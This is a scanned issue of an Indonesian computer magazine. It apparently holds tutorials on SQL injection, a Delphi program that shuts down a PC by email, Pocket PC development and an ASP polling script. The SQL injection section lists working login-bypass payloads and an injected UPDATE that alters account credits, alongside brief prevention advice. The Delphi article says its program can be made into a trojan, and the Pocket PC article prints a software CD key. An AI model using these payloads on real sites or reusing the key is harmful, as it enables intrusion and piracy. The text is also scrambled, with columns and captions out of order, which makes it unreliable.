INSERT INTO Statement INSERT INTO statement digunakan untuk memasukkan data baru yang ditempatkan di row (baris) pada sebuah tabel. Syntaks INSER INTO Statement:
INSERT INTO [nama_tabel] VALUES (value1, value2, ...)

Atau lebih dispesifikkan pada kolom, yaitu:
INSERT INTO [nama_tabel] (kolom1, kolom2, ...) VALUES (value1, value2, ...)

Gambar 7. UPDATE Statement.

SQL Injection
SQL Injection attack merupakan salah satu teknik dalam melakukan web hacking untuk menggapai akses pada sistem database yang berbasis SQL. Teknik ini memanfaatkan kelemahan dalam bahasa pemograman scripting pada SQL dalam mengolah suatu sistem database. Hasil yang ditimbulkan dari teknik ini membawa masalah yang sangat serius, untuk lebih jelas memperlihatkan tingkat keseriusan atau dampak dari SQL Injection attack maka silakan baca artikel Database Hacking: SQL Injection (Andi Ismayadi), NeoTek Vol. IV No. 05) sebagai gambaran studi kasus di lapangan. Mengapa disebut SQL Injection? Seperti yang yang kita ketahui, injection jika diartikan kedalam bahasa Indonesia yaitu 'suntikan.' Yang terjadi memang seperti melakukan suntikan terhadap SQL yang tujuannya adalah tergantung kepada pelakunya, dan pada intinya jika disalahgunakan maka akan membawa aspek negatif terhadap korban.
Gambar 4 dan 5. INSERT INTO Statement.

UPDATE Satement UPDATE Statement digunakan untuk memperbaharui atau memodifikasi data pada tabel. Syntaks UPDATE Statement:
UPDATE [nama_tabel] set [nama_kolom = value_baru] WHERE [nama_kolom = value]

Prinsip SQL Injection Sudah disinggung di atas bahwa SQL Injection attack memanfaatkan kelemahan dalam bahasa pemograman scripting pada SQL, maksudnya adalah memanfaatkan teknik stringbuilding untuk mengeksekusi/menjalankan kode SQL. Jadi prinsip dasar SQL Injection sebenarnya memanfaatkan kode insecure (tidak aman) atas sebuah sistem yang terhubung ke internet dalam upaya melangkahi command (perintah) dan secara langsung menuju ke database untuk kemudian mengambil keuntungan dari sistem yang dijamin aman untuk melakukan pengambilan atau pengubahan atau lain sebagainya oleh penyerang. Keuntungan yang diambil adalah seperti login akses terhadap server yang bukan haknya atau yang lainnya, tergantung kepada penyerangnya. Input Query String Default setting dari SQL menggunakan adminID = sa dan password = ' ' (kosong atau blank), merupakan kondisi yang berbahaya jika pengubahan setting tidak segera dilakukan. Vol. IV No. 07 NeoTek
31

Gambar 6. UPDATE Statement.

NeoTekno
Input query string dapat dilakukan dengan dua cara yaitu: URL input query string dan Box input query string. Ada banyak variasi dari injection string yang dapat digunakan untuk melakukan SQL Injection (lihat Tabel 2):
Tabel 2 ' or 1=1-' or 0=0 -' or 'x'='x ' or a=a" or 0=0 -" or 0=0 # " or "x"="x ") or ("a"="a admin'-hi" or 1=1 -hi' or 'a'='a hi") or ("a"="a or 0=0 # ' or a=a-' or 0=0 # ' or 1=1-' having 1=1-" or 1=1-" or "a"="a ') or ('a'='a ') or ('x'='x hi" or "a"="a hi' or 1=1 -hi') or ('a'='a or 0=0 -or 1=1--

Gambar 8. URL Input Query String.

Serangan dengan menggunakan SQL Injection dapat lebih bervariasi lagi dan itu tergantung kepada situasi dan tujuan dari serangan yang dilakukan oleh penyerang. Contoh:
' UPDATE YepCell_membersDB set Credits = 100 where UserID ='yamakasi'

Gambar 9. Input Box Query String.

Verifikasi yang dilakukan oleh SQL disaat pemakai memasukkan username dan password adalah seperti yang terlihat pada teks sebagai berikut:
SQLQuery = "SELECT Username FROM Users WHERE Username = '" & strUsername & "' AND Password = '" & strPassword & "'

Injection String Pada verifikasi terdapat kelemahan pada pemprosesan pada string-string tertentu yang sebenarnya string tersebut dapat dikatakan sebagai input ilegal. Verifikasi tetap melakukan proses dan nantinya menghasilkan error page. Error page tersebut justru membuka rahasia struktur database, dan bahkan error page tetapi eksekusi terhadap validasi input tetap dijalankan. Contoh: menggunakan injection string ' OR ' '= pada username maupun password baik dilakukan dengan metode URL input query string maupun Box input query string maka SQL query akan membacanya sebagai berikut:
SELECT Username FROM Users WHERE Username = ' ' OR ' '=' ' AND Password = ' ' OR ' '=' '

Gambar 11. Injection string.

Deteksi dan Pencegahan SQL Injection
SQL Injection yang dilakukan seseorang dapat dideteksi I dengan menggunakan IDS (Intrusion Detection System). IDS bukan lagi tool yang terlalu asing terdengar di telinga anda dan NeoTek pernah membahasnya pada Vol. II No. 11, Agustus 2002, dan Vol. II No. 12, September 2002. Selanjutnya langkah pencegahan terhadap SQL Injection Attack. Seperti yang diketahui SQL Injection menggunakan injection string. Injection string menggunakan karakter-karakter tertentu. Untuk itu, anda harus Gambar 12. Escape string. menandai agar karakter-karakter tersebut untuk tidak diizinkan melakukan akses. Jika anda menggunakan MS SQL, anda dapat menggunakan tool EscapeString dari Mike Hillyer. Source code-nya ada di http://www.vbmysql.com/download/escapestring.zip. Sebaiknya juga para admin memiliki rasa tanggung jawab membaca makalah-makalah sehubungan dengan SQL Injection. Pada CD NeoTek kali ini disertakan beberapa makalah (format PDF) yang membahas SQL Injection Attack lebih mendalam, berikut teknik pencegahannya.

Maka yang terjadi adalah SQL query akan menyatakan blank username dan blank password sebagai user yang sah (valid). SQL injection yang berhasil dilakukan akan ditandai dengan munculnya error page, dengan error yang dimunculkan dapat berupa ODBC error, internal server error, syntax error, dan lain sebagainya.

Gambar 10. Tanda suksesnya SQL Injection. 32

NeoTek Vol. IV No. 07

NeoTutor

DELPHI WORKSHOP
SHUTDOWN KOMPUTER LEWAT EMAIL (SVE)
Kita coba suatu kesenangan tersendiri dalam bermain dengan komputer. Happy Candraleka (cakrabirawa@mail.ru) menjelaskan cara shutdown komputer secara remote melalui email menggunakan program SVE (Shutdown Via Email) karya penulis sendiri.

yang bisa di-download (mendukung POP). Pada simulasi ini anda bekerja dengan dua komputer yang terhubung ke Internet. Satu komputer pribadi di rumah yang mempunyai koneksi Internet dan satu lagi di warnet. Bila telah paham, anda dapat menyesuaikan ke-6 langkah berikut sesuai dengan kondisi anda sendiri. Program ini merupakan aplikasi pen-download email yang disertai rutin-rutin tambahan agar terus-menerus memantau masuknya email dan mampu melakukan shutdown bila ada email masuk dengan subject SVE. Dengan sedikit manuver, penambahan kode program, dan trik pemrograman, SVE dapat diubah menjadi sebuah trojan. Disini hanya simulasi. Silakan kembangkan sendiri.

A

NDA HARUS MEMPUNYAI EMAIL ACCOUNT

Mau shutdown komputer di rumah? Kirim email dari warnet untuk mematikannya. Atau mau sebaliknya?

1

MENDAPATKAN APLIKASI SVE
Ada dua cara untuk mendapatkan perangkat SVE ini. Pertama, dengan men-download-nya di situs http://come.to/digitalworks. Kedua dengan meng-copy-nya dari CD NeoTek edisi ini.

2

KONFIGURASI SVE (DI RUMAH)
SVE tidak memerlukan instalasi. Jalankan saja file SVE.EXE untuk menjalankan program SVE. Isikan setting email account Anda (email yang mendukung POP) pada kotak Fill These Settings. Untuk Host isikan host email, misalnya pop3.telkom.net untuk email telkom.net.

3

BUKA KONEKSI INTERNET (DI RUMAH) DAN AKTIFKAN SVE
Dial koneksi ke Internet. Isikan dengan setting-setting yang biasa Anda gunakan untuk membuka koneksi ke Internet. Kembalilah ke program SVE. Tekan tombol Activate.

4

PERGI KE WARNET TERDEKAT
Pergilah ke warnet terdekat. Anda beruntung bila warnetnya ada di sebelah rumah. Kemudian kirim email ke account yang anda isikan pada Langkah 2. Anda bisa mengirim email dari sembarang email account asalkan ditujukan ke account yang digunakan pada Langkah 2.

5

EMAIL DENGAN SUBYEK SVE
Pastikan email yang Anda kirim tersebut memuat subject yang berisi SVE. Tanpa tanda kutip dan tanpa diikuti karakter lainnya, termasuk spasi. Lanjutkan dengan mengirimnya dengan menekan tombol Send.

6

DRAG-N-DROP KE MPEGAV
SVE akan memantau masuknya email setiap 5 detik sekali. Bila ada email yang masuk dengan subject SVE maka komputer di rumah Anda akan ter-shutdown secara otomatis dan dilakukan dari jarak jauh (remote).

Vol. IV No. 07 NeoTek

33

NeoTutor

The Making of SVE
Ingin memahami lebih jauh mengenai SVE (Shutdown Via Email)? Pencipta program ini Happy Candraleka (cakrabirawa@mail.ru) membahasnya untuk anda. Siapkan dulu Borland Delphi 7 di komputer anda.
penggunaan SVE dalam enam langkah, anda telah dipandu melakukan simulasi mematikan komputer dari jarak jauh melalui pengiriman email. Pada pembahasan kali ini kita akan mempelajari cara membuat program SVE itu sendiri. Program SVE yang akan kita buat ini menggunakan bahasa pemrograman Delphi. Untuk itu disarankan agar anda meng-install Borland Delphi 7 pada komputer anda. Hal ini karena pada program SVE kita akan menggunakan komponen Indy versi terakhir yang di Delphi 7. Bisa saja anda gunakan komponen Indy pada versi Delphi sebelumnya tetapi tentunya dengan sedikit penyesuaian. Pada dasarnya SVE merupakan program pen-download email yang telah dimodifikasi sedemikian sehingga dapat melakukan monitoring secara terusmenerus terhadap masuknya email ke suatu email account. Kemudian bila email yang masuk ter-sebut mempunyai subject SVE, maka

D E LP H I WO R KS H O P

P

ADA TUTORIAL SEBELUMNYA, YAITU

program SVE akan menjalankan rutin yang berfungsi mematikan (shutdown) komputer. Dengan demikian aplikasi SVE ini dapat digunakan oleh untuk mematikan komputer secara jarak jauh melalui email

Perancangan Antarmuka (Graphical User Interface)
Dalam pemrograman berbasis visual, maka tahap pertama yang perlu dilakukan adalah merancang tampilan atau antarmuka program yang dikenal sebagai Graphical User Interface (GUI). Anda dapat menyusun komponen-komponen pada bidang Form1. Tambahkan komponen inti program SVE ini, yaitu komponen TIdPOP3, yang terletak pada Component Pallete di tab Indy Clients, dan komponen TIdMessage yang terletak di tab Indy Misc. Tambahkan juga komponen TListView yang terletak pada tab Win32. Komponen ini berfungsi untuk menampilkan daftar header-header email yang masuk ke email account.

Selebihnya adalah komponen-komponen umum digunakan dalam pembuatan aplikasi, seperti TEdit, TLabel, TButton, dan TPanel. Kemudian aturlah tata letaknya sedemikian rupa seperti ditunjukkan pada Gambar 2.

Gambar 2. Antamuka Shutdown Via Email .

Kode Penting Program
Kode program SVE tersusun atas lebih dari 200-an baris. Kode program sebanyak ini tergolong sedikit. Untuk efisiensi, penulis hanya akan menjelaskan sebagian kode-kode tersebut, utamanya yang merupakan 'mesin' dari SVE ini. Pada saat user menekan tombol Okay, proses yang terjadi adalah memasukkan setting-setting, yang telah diisikan oleh user pada tiga komponen TEdit, ke dalam properti TIdPOP3. Kode intinya adalah
IdPOP3.Host := lblHost.Text; IdPOP3.Username := lblUserName.Text; IdPOP3.Password := lblPassword.Text;

Kemudian user akan menekan tombol Activate. Apa aksi yang terjadi pada penekanan tombol ini? Kita lihat dulu kode inti yang ditangani tombol ini.
Try IdPOP3.Connect; except on EidSocketError do begin Showmessage ('Host not found or'+#13+

Gambar 1. IDE Delphi 7 saat membangun aplikasi SVE 34

NeoTek Vol. IV No. 07

NeoTutor
'No Internet connection available'); btnActivate.Caption := 'Activate'; end; end;

Kemudian akan men-download (membaca) header email yang ditangani oleh prosedur AmbilPOPHeaders.

Baru Mulai Belajar Delphi?
Bagi yang baru saja mengenal Borland Delphi, silakan ikuti artikelartikel tulisan Happy Candraleka (cakrabirawa@mail.ru) di nomornomor NeoTek terdahulu sebagai berikut:

Aksi yang terjadi dari penekanan tombol ini adalah suatu percobaan untuk berkoneksi dengan host yang ditangani oleh komponen TIdPOP3. Koneksi ini dipengaruhi oleh valid tidaknya masukan untuk properti TIdPOP3 yang ditangani oleh tombol Okay sebelumnya. Dalam hal ini ada dua kemungkinan. Koneksi dapat terjadi atau tidak. Bila tidak maka akan tampil kotak pesan seperti Gambar 3.

Kode Program AmbilPOPHeaders
Inilah kode program untuk prosedur AmbilPOPHeaders.
procedure TForm1.AmbilPOPHeaders(inMsgCount: Integer); var intIndex: integer; itm: TListItem; begin DaftarHeader.Items.Clear; for IntIndex := 1 to inMsgCount do begin Application.ProcessMessages; IdMessage1.Clear; IdPOP3.RetrieveHeader(intIndex, IdMessage1); itm := DaftarHeader.Items.Add; itm.Caption := IdMessage1.Subject; itm.SubItems.Add(IdMessage1.From.Text); if UpperCase (trim(itm.Caption)) = 'SVE' then begin Timer1.Enabled := false; btnActivate.Caption := 'Activate'; IdPOP3.Disconnect; //disconnect from host ExitWindowsEx (EWX_ShutDown, 0); //Show time .. end; end; end;

Gambar 3. Kotak Pesan Host not found or No internet connection available

Bila terjadi koneksi dengan host, maka event OnConnected milik komponen TIdPOP3 akan beraksi menjalankan perintah berikut ini.
procedure TForm1.IdPOP3Connected(Sender: TObject); begin Timer1.Enabled := true; Edit1.Text := 'Connected to host '+ lblHost.Text; end;

NeoTek III/08 Borland Delphi 7: Personal Edition Full Version Delphi Workshop: Delphi Tweaking Tool NeoTek IV/05 Delphi Workshop: Inno Installer Delphi Workshop: Cyber Merpati Email Client

Maksud kode program di atas adalah mengaktifkan Timer1. Perlu dicatat, bahwa kondisi awal Timer1 adalah disable (Properti Enabled berisi false). Dan Timer1 akan menjalankan aksinya setiap interval 5 detik (Properti Interval berisi 5000). Apa yang terjadi setiap detik kelima? Timer1 akan menjalankan perintah berikut ini.
HitungPesan := IdPOP3.CheckMessages; If HitungPesan > 0 then begin Edit1.Text := 'You'+chr(39)+'ve got mail.....'; AmbilPOPHeaders(HitungPesan); end else Edit1.Text := 'No message in the server';

Dari kode program ini terlihat jelas bahwa bila subject email berisi SVE maka TIdPOP3 akan memutuskan koneksinya dengan host dan dilanjutkan dengan men-shutdown komputer. Demikianlah inti ('mesin') dari kode SVE. Kode program yang lainnya adalah pelengkap yang dibuat untuk menyesuaikan kerja SVE dan memudahkan user dalam berinteraksi dengan program. Bila anda memahaminya, anda dapat memodifikasi SVE sesuai kebutuhan Anda sendiri, sebagaimana pesawat CN 235 yang dapat diubah dari pesawat angkut sipil menjadi pesawat angkut militer. Semuanya tergantung anda sendiri. anda dapat memperoleh kode program selengkapnya pada CD NeoTek yang disertakan pada majalah ini. Sayoonaraa …

Situs Penulis
Anda juga dianjurkan untuk mengunjungi situs penulis, yang selain berisi berbagai tutorial, khususnya tetang Borland Delphi, juga berbagai tool yang dapat didownload di
http://come.to/digitalworks

Rutin ini adalah pengecekan email yang masuk ke account. Bila ada pesan yang masuk, maka Edit1 (yang berfungsi sebagai status bar) akan menampilkan tulisan You've got mail …. Vol. IV No. 07 NeoTek
35

NeoTutor

eMbedded Visual Basic (eVB)
Untuk membuat aplikasi Pocket PC anda tidak perlu punya Pocket PC-nya sendiri, sebab dapat menggunakan emulator. Pemrogramannya pun relatif mudah menggunakan eMbedded Visual Basic. Fitrianto Halim (fitriantoh@hotmail.com) memperkenalkannya pada anda.
untuk Pocket PC, bagaimana kalau sekarang kita membuat sendiri aplikasi untuk Pocket PC? Untuk memudahkan dalam mewujudkan impian anda, penulis akan membahas pembuatan aplikasi untuk Pocket PC menggunakan eMbedded Visual Basic.

WO R KS H O P POC K ET PC

S

EBELUMNYA KITA TELAH MENGENAL APLIKASI-APLIKASI

Proses instalasinya bisa anda lihat pada gambar-gambar yang disertakan.

Instalasi
Penulis menggunakan Microsoft® eMbedded Visual Tools 3.0 2002 Edition yang dapat di-download pada URL: http://download.microsoft.com/download/9/d/2/9d2f6ee84c75-4749-86df-2dd5189e6081/evt2002web_min.exe Microsoft® eMbedded Visual Tools 3.0 2002 Edition dapat dikatakan merupakan desktop development environment yang lengkap untuk menciptakan aplikasi ataupun component bagi mobile device yang menggunakan OS MS Windows CE 3.0, termasuk di dalamnya Pocket PC dan Smartphone (penulis belum akan mengulas Smartphone pada artikel ini). Secara lengkap, Microsoft® eMbedded Visual Tools 3.0 2002 Edition berisi sebagai berikut: • Microsoft eMbedded Visual C++® 3.0 • Microsoft eMbedded Visual Basic 3.0® • Software Development Kits (SDKs) untuk Pocket PC 2002 • Software Development Kits (SDKs) untuk Smartphone 2002 Microsoft® eMbedded Visual Tools 3.0 2002 Edition belum berisi SDK untuk Palm Size PC serta Handheld PC. Anda bisa men-download-nya pada URL berikut bila anda membutuhkannya: • Palm-size PC 1.2 SDK
http://msdn.microsoft.com/downloads/default.asp?url=/downloads /sample.asp?url=/msdn-files/027/001/968/msdncompositedoc.xml

• Handheld PC Professional Edition 3.0 SDK
http://msdn.microsoft.com/downloads/default.asp?url=/downloads /sample.asp?url=/msdn-files/027/001/966/msdncompositedoc.xml

• Handheld PC 2000 SDK
http://msdn.microsoft.com/downloads/default.asp?url=/downloads /sample.asp?url=/msdn-files/027/001/965/msdncompositedoc.xml

Sebelum anda melakukan instalasi, ada baiknya kalau anda memperhatikan System Requirement-nya. Hanya, berdasarkan salah satu file readme yang disertakan pada hasil instalasi disebutkan bahwa OS yang dibutuhkan adalah: • Microsoft® Windows® 2000 Professional, Server atau Advanced Server dengan Service Pack 2 (atau sesudahnya) • Microsoft® Windows® XP Home atau Professional Instalasinya cukup mudah, yaitu dengan menjalankan file evt2002web_min.exe. Saat anda diminta memasukkan CD key, masukkan TRT7H-KD36T-FRH8D-6QH8P-VFJHQ sebagai CD key.
36

NeoTek Vol. IV No. 07

NeoTutor
Pengujian Koneksi ke Device (Emulator)
Sebelum membuat aplikasi, ada baiknya kita terlebih dahulu menguji koneksi antara komputer kita sebagai server dan emulator PocketPC sebagai client. Untuk dapat menggunakan emulator, anda diminta telah memasang network card atau MS Loopback Adapter. Penulis menggunakan OS MS Win2K server yang default-nya menyertakan MS Loopback Adapter. Untuk pengujian koneksi ke device tersebut, masuk ke menu Tools > Remote Tools > Configure Platform Manager... Klik tombol Test pada bagian Device Properties untuk mulai melakukan pengujian koneksi ke device.

Pada bagian Windows CE Platform Manager Configuration pilih platform atau device yang diinginkan, lalu klik Properties...

Pengujian koneksi ke device berhasil bila Anda mendengar suara sebagaimana lazimnya suara saat Windows Startup serta adanya pesan Connection to device established. Jika gagal dalam pengujian koneksi ke device, cobalah cek network card atau Microsoft Loopback Adapter (biasanya berkaitan dengan konfigurasi TCP/IP), serta pada bagian Device Properties cek pula konfigurasi transport yang digunakan (klik tombol Configure...) Perhatikan, terkadang saat kita mencoba aplikasi pada emulator, emulator meminta kita untuk menguji terlebih dahulu koneksi ke device.

Membuat Aplikasi

Setelah proses instalasi selesai, anda akan menemukan menu Microsoft eMbedded Visual Tools di Start > Programs dan tentunya kita memilih eMbedded Visual Basic 3.0 untuk membuat aplikasi menggunakan eMbedded Visual Basic. Penulis yakin, bagi anda yang pernah menggunakan VB tentunya familiar dengan IDE dari eVB ini.

Vol. IV No. 07 NeoTek

37

NeoTutor

Sekarang, mari kita membuat sebuah aplikasi sederhana. Anda bisa juga langsung mencoba aplikasi yang disertakan pada CD NeoTek dengan memilih: File > Open Project... atau shortkey Ctrl+O . Ubahlah properti Form1 menjadi:
• (Name) dari Form1 menjadi frmForm1 • Caption dari Form1 menjadi Hello World

• (Name) dari Label1 menjadi lblLabel1 • Caption dari Label1 menjadi Hello ! • Font dari Label1 menggunakan size 48

Tambahkan sebuah label pada form, serta ubahlah properti Label1 menjadi:

Gunakan menu Project > Project1 Properties... untuk mengkonfigurasi project anda. Sebagai contoh, anda bisa mengubah Remote Path (ada pada tab General ) yang default-nya \Windows\Start Menu\ ganti menjadi \Windows\Start Menu\Programs . Perubahan ini berakibat terhadap tempat shortcut dari aplikasi diletakkan.
38

Untuk menjalankan aplikasi pada emulator, gunakan menu Run > Execute atau shortkey Ctrl+F5. Perhatikan, karena anda meletakkan shortcut di Start > Programs, maka pertama-tama tap (istilah klik di Pocket PC) Start lalu tap Programs. Lalu tap Hello untuk menjalankan aplikasi kita. Aplikasinya memang sederhana, karena penulis yakin anda pasti bisa mengembangkannya bila terbiasa menggunakan Visual Basic (kalau belum, bacalah berbagai tutorial Visual Basic di NeoTek).

NeoTek Vol. IV No. 07

NeoTutor
Pada bagian eMbedded Visual Basic App Install Wizard - Step 4 , Anda diminta memasukkan folder tempat output file diciptakan.

Membuat Paket Instalasi
Setelah aplikasi tersebut berhasil dijalankan, kini kita akan membuatkan paket instalasinya. Untuk itu, pilih menu File > Make Hello.vb... dan pilih folder mana akan dibuat.

Pada eMbedded Visual Basic App Install Wizard - Step 5, anda diminta memilih prosesor apa saja yang akan digunakan. Tampak bahwa untuk Pocket PC 2002 baru ada untuk prosesor ARM 1100 dan I486. Pada eMbedded Visual Basic App Install Wizard - Step 6, anda diminta memilih ActiveX control apa saja yang akan ditambahkan saat instalasi nanti. Tentunya, anda harus mengetahui ActiveX apa saja yang digunakan agar paket instalasi tidak bertambah besar bila menyertakan ActiveX yang tidak diperlukan. Setelah selesai membentuk paket instalasi, anda bisa mencek folder sesuai dengan yang anda masukkan pada Vol. IV No. 07 NeoTek
39

Selanjutnya, pilih menu Tools > Remote Tools > Application Install Wizard... dan anda tinggal mengikuti langkah-langkah yang diminta.

Pada bagian eMbedded Visual Basic App Install Wizard - Step 2, anda diminta memasukkan path untuk eMbedded Basic . Project (.EBP). File ini dihasilkan saat menyimpan project, yaitu menu File > Save Project atau File > Save Project As... .

NeoTutor
eMbedded Visual Basic App Install Wizard - Step 4. Perhatikan bahwa file instalasi terdapat di sub folder CD1, yaitu Setup.exe Bila anda mempelajari file-file yang ada pada folder tiap-tiap prosesor, dapat dikatakan bahwa hasil compile dari eVB bukanlah dalam bentuk binary murni yang dapat dijalankan oleh prosesor yang

ECARA DEFAULT, SKIN EMULATOR POCKET PC YANG TERdapat pada eMbedded Visual Tools - 2002 hanya satu, yaitu: ppc2002. Skin tersebut disimpan sebagai file p XML (ppc2002.xml) yang untuk setiap skin terdapat tiga m buah file bitmap (mapping, normal, dan down).

S

Gambar 1 & 2. Skin default adalah ppc2002.xml yang mempunyai tiga buah file bitmap.

bersangkutan, karena memerlukan semacam binary run-time, yaitu file pvbload.exe .

Penutup
Penulis berharap tulisan ini dapat membantu Anda yang ingin mengembangkan aplikasi pada PocketP C 2002 menggunakan Microsoft® eMbedded Visual Tools 3.0 2002 Edition, karena telah tersedia eVB di dalamnya. Selamat mencoba...

Untuk lebih jelasnya, silakan eksplorasi folder \Windows CE Tools\wce300\Pocket PC 2002\emulation tempat skin ppc2002 berada. Namun jika kita mempelajari file-file hasil instalasi, kita juga akan menemukan lima buah skin lainnya, yaitu: • Media • PDA • Phone • PortableMedia • WebPad yang skin-skin tersebur berada di \Program Files\Windows CE Tools\Common\Platman\sdk\samples\emulator_skins Dengan demikian, anda tinggal mem-backup file-file skin (sebuah file XML dan tiga buah file bitmap) lama dan mengcopy file-file skin baru ke folder \Windows CE Tools\wce300\Pocket PC 2002\emulation.

40

NeoTek Vol. IV No. 07

NeoTutor

Skin Emulator Pocket PC
Pocket PC 2002 merupakan sistem operasi untuk portable device yang bukan hanya PDA, melainkan juga Smartphone serta perangkat yang masih hipotetis seperti PortableMedia dan WebPad. Fitrianto Halim (fitriantoh@hotmail.com) mengungkapkannya untuk anda.
mengganti ekstensinya dari .xml menjadi .xml.bak untuk file skin lama atau yang tidak digunakan.

WO R KS H O P POC K ET PC

Gambar 3 & 4. Masih terdapat lima macam skin lagi untuk emulator Pocket PC, yaitu Media, PDA, Phone, PortableMedia, dan Webpad.

Hal ini disebabkan, emulator tidak memiliki kemampuan untuk memberi pilihan kepada Anda skin mana yang akan dipergunakan. Berikut adalah berbagai skin untuk Pocket PC emulator: Media, PDA, Phone, PortableMedia, serta WebPad.

Atau, bisa pula anda

Vol. IV No. 07 NeoTek

41

NeoTutor

Computer Polling
Setelah membahas berbagai fungsi untuk situs menggunakan ASP maupun PHP, Wawan Ridwan (iniemailwawan@telkom.net) kini membahas cara membuat computer polling dengan memanfaatkan ASP (Active Server Pages).
visi, mungkin pernah melihat polling yang diselenggarakan oleh pengelola. Polling adalah salah satu cara yang cukup mudah untuk menjaring pendapat umum tentang suatu masalah. Contohnya adalah polling yang kita lihat di televisi adalah mengenai calon Presiden dan Wakilnya. Polling juga sering kita lihat dalam sebuah situs. Pengelola situs menyelenggarakan sebuah polling dengan mengajukan pertanyaan, misalnya: Apa yang anda sukai dalam situs? Kemudian sang pengelola menyediakan daftar pilihan jawaban untuk pertanyaan polling tersebut dengan harapan pengunjung situs berpartisipasi dalam polling tersebut dengan cara memilih salah satu atau beberapa jawaban. Setiap pilihan jawaban yang sudah dipilih pengunjung disimpan dalam database dan disebut suara. Dan seluruh suara yang sudah terkumpul akan dikelompokkan dan dicari persentasenya. Persentase setiap pilihan jawaban akan ditampilkan dalam bentuk grafik. Grafik yang muncul akan menginformasikan pendapat umum tentang masalah atau pertanyaan yang diajukan oleh pengelola polling tersebut. Lalu... ada apa dengan polling? Tidak ada apa-apa sesungguhnya. Hanya saja saya ingin sedikit berbagi pengalaman dengan anda tentang mudahnya membuat sebuah layanan polling dengan ASP (Active Server Pages). Untuk membuat sebuah polling, yang kita perlukan adalah kemampuan memilah data, membentuk jumlah masing-masing suara yang masuk dalam nilai persentase. Hasil akhir dari nilai persentase tersebut ditampilkan dalam bentuk grafik. Mari kita simak salah contoh bentuk polling yang hasilnya ditampilkan dalam bentuk grafik, lihat Gambar 1.

AS P WO R KS H O P

S

AYA, ANDA DAN SIAPA PUN YANG SUKA NONTON TELE-

Dalam polling ini pengunjung hanya diijinkan untuk memilih salah satu pilihan jawaban yang sudah disediakan. Polling yang saya buat ini memang disediakan dua jenis polling, yakni Single-Select dan Multiple-Select. Jenis polling polling Multiple-Select mengijinkan pengunjung untuk memilih lebih dari satu jawaban atas pertanyaan yang diajukan dalam polling. Anda dapat melihat contoh tampilan polling jenis Multiple-Select pada Gambar 2.

Gambar 2. Jenis polling Multiple-Select.

Untuk polling dengan jenis Single-Select disediakan dua jenis form untuk menampilkan pilihan-pilihan jawaban polling. Jenis form tersebut yakni Drop-Down Menu dan Radio-Button. Untuk jenis form Drop-Down-Menu anda sudah melihatnya dalam Gambar 2, sedangkan untuk jenis form Radio-Button bisa anda bisa lihat pada Gambar 3.

Gambar 3 Jenis polling Single-Select dan jenis form Radio-Button.

Gambar 1. Bentuk polling Single-Select dengan jenis form Drop-Down Menu.

Gambar 1 menunjukkan salah satu bentuk polling yang sudah saya buat. Polling tersebut jenisnya Single-Select dengan form Drop-Down Menu.
42

Dalam gambar-gambar contoh polling yang sudah saya perlihatkan di atas, mungkin anda melihat ada sesuatu yang agak lain dibandingkan polling yang biasa anda lihat dalam sebuah situs. ‘Kelainan’ tersebut terlihat pada adanya grafik hasil polling yang langsung ditampilkan bersamaan dengan polling. Memang demikian adanya, polling ini saya rancang sedemikian rupa untuk mempersingkat proses, supaya pengunjung yang ingin melihat hasil sementara polling tidak perlu melakukan klik terhadap sebuah link, yang misalnya Lihat hasil, untuk melihat hasil sementara polling. Dan ‘kelainan’ lainnya adalah pada saat pungunjung menekan tombol Vote maka tampilan akan kembali pada halaman

NeoTek Vol. IV No. 07

NeoTutor
yang sama, yakni halaman yang berisi polling, dengan tampilan grafik yang tentu saja berbeda dengan semula karena hasil sementara polling sudah bertambah dengan suara yang yang dimasukkan oleh pengunjung tersebut. Dengan hanya mendapatkan sedikit gambaran yang sudah saya sebutkan di atas mungkim anda merasa penasaran atas polling yang saya maksudkan. Baiklah sekarang saya akan menjelaskan cara menggunakan polling ini. Tapi sebelumnya saya ingin menjelaskan apa saja kelebihan dan ‘kelainan’ polling ini. Polling ini dibuat dengan ASP (Active Server Pages) dengan database Microsoft Access 2000. Semoga anda setuju dengan pendapat yang mengatakan bahwa program ini cukup ‘dinamis,’ ‘atraktif,’ dan ‘interaktif’ (perhatikan tanda kutip terhadap kata-kata tadi). oleh pengunjung atau tidak. Jika admin mengijinkan pengunjung untuk mencatat komentar atas sebuah polling maka akan disediakan link yang diletakkan pada bagian bawah polling. Jika sebuah polling diijinkan untuk diberi komentar, maka komentar-komentar tersebut dapat dibuka oleh pengunjung seperti yang dapat anda lihat dalam Gambar 6.

‘Dinamis’
Sesungguhnya saya tidak memiliki kemampuan untuk membatasi arti kata ‘dinamis’ yang saya sebutkan di atas. Untuk itu sebelumnya saya mohon maaf jika kata dinamis yang saya maksudkan tidak cocok untuk polling saya ini. Jika salah, anggap saja saya adalah orang yang sok tahu. Saya sebut polling saya ini sebagai ‘dinamis’ dengan ciriciri sebagai berikut : Pilihan Bahasa
Gambar 4. Menu pilihan bahasa.

Gambar 6. Daftar komentar.

Pengunjung bisa memilih bahasa yang disukainya dalam polling ini. Bahasa-bahasa yang sudah disediakan dalam polling ini antara lain: Indonesia, Jerman, Italia, Spanyol, Yunani, Jawa, Sunda, Sansakerta, Inggris, Arab, Madura, Perancis, Belanda, Jepang, Mandarin, Melayu, dan Rusia. (Saya yakin anda tertawa membaca daftar pilihan bahasa yang saya sebutkan tadi). Untuk memilih salah satu bahasa yang diiinginkan pengunjung bisa memilihnya dalam drop-down menu pada bagian atas halaman, contohnya dapat anda lihat dalam Gambar 4. Style
Gambar 5. Menu pilihan tampilan.

Karena keterbatasan halaman artikel, saya tidak menjelaskan lebih lanjut apa saja kekurangan dan ‘kelainan’ polling ini. Kita langsung membahas cara menggunakan polling ini. Sesungguhnya tidak ada yang ‘aneh’ dalam menggunakan polling ini. Anda hanya perlu melakukan sedikit perubahan pada variable yang berisi lokasi database untuk menyimpan data polling ini. Variable tersebut bernama PathDB, terdapat dalam file config_poll.asp dalam direktori Include. Variable tersebut berisi string yang menyatakan sebagai direktori tempat menyimpan database: PathDB="DataBase/" Dalam variable di atas database polling ini saya simpan dalam folder DataBase, dengan nama file database Poll.Mdb. Jika anda sudah menyesuaikan variable database tersebut seperti yang sudah saya jelaskan tadi, segeralah upload file-file polling ini. Ketik index.asp pada kolom Address pada browser maka halaman utama polling akan tampil. Contoh tampilannya dapat anda lihat pada Gambar 1. Untuk melakukan kegiatan administrasi silakan login dengan UserName dan Password sementara, yakni: UserName : admin Password : admin Jika perlu anda dapat mengganti UserName dan Password yang disediakan dengan memilih menu Edit UserName dan Password. Setelah anda login anda dapat membuat polling-polling baru.

